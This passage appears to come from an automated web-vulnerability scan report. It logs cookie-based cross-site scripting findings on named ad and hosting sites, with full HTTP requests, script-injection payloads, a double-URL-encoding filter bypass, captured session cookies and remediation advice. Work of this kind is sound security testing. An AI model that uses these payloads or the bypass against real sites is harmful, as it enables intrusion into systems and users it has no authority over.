GET /ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d55568de34"><script>alert(1)</script>f99e5bb2eec
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: Content-Length: 3132 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:42 GMT Connection: close
The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80106"><script>alert(1)</script>a7f3b17766c was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d555680106"><script>alert(1)</script>a7f3b17766c
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: Content-Length: 2851 Content-Type: text/html Date: Sat, 05 Feb 2011 15:59:41 GMT Connection: close
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ad84%2527%253b00ba9547042 was submitted in the IS_UASrackuid cookie. This input was echoed as 6ad84';00ba9547042 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645df%2527%253b14f4e5886cf was submitted in the IS_UASrackuid cookie. This input was echoed as 645df';14f4e5886cf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8645df%2527%253b14f4e5886cf; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39632%2527%253b51a258d1970 was submitted in the IS_UASrackuid cookie. This input was echoed as 39632';51a258d1970 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/backup_and_collaboration/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f839632%2527%253b51a258d1970; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f6a%2527%253b050b0238238 was submitted in the IS_UASrackuid cookie. This input was echoed as 64f6a';050b0238238 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/backup_and_collaboration/data_backup_software/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f864f6a%2527%253b050b0238238; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145e5%2527%253b723bb6ef75f was submitted in the IS_UASrackuid cookie. This input was echoed as 145e5';723bb6ef75f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/backup_and_collaboration/online_file_storage/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8145e5%2527%253b723bb6ef75f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5db2d%2527%253bd722a986d37 was submitted in the IS_UASrackuid cookie. This input was echoed as 5db2d';d722a986d37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85db2d%2527%253bd722a986d37; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4dc%2527%253b79d2c0ab149 was submitted in the IS_UASrackuid cookie. This input was echoed as 1a4dc';79d2c0ab149 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81a4dc%2527%253b79d2c0ab149; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3a89%2527%253ba33747be63c was submitted in the IS_UASrackuid cookie. This input was echoed as a3a89';a33747be63c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2010/06/increase_productivity_with_free_training/ HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a3a89%2527%253ba33747be63c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f65b2%2527%253b8d6b737ba90 was submitted in the IS_UASrackuid cookie. This input was echoed as f65b2';8d6b737ba90 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2011/01/content_management_system_comparison_search_engine_optimization HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f65b2%2527%253b8d6b737ba90; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9573%2527%253b5be92eab07b was submitted in the IS_UASrackuid cookie. This input was echoed as f9573';5be92eab07b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/blog/2011/01/in-house_or_hosted_email HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f9573%2527%253b5be92eab07b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 435c4%2527%253b58176ca46d5 was submitted in the IS_UASrackuid cookie. This input was echoed as 435c4';58176ca46d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
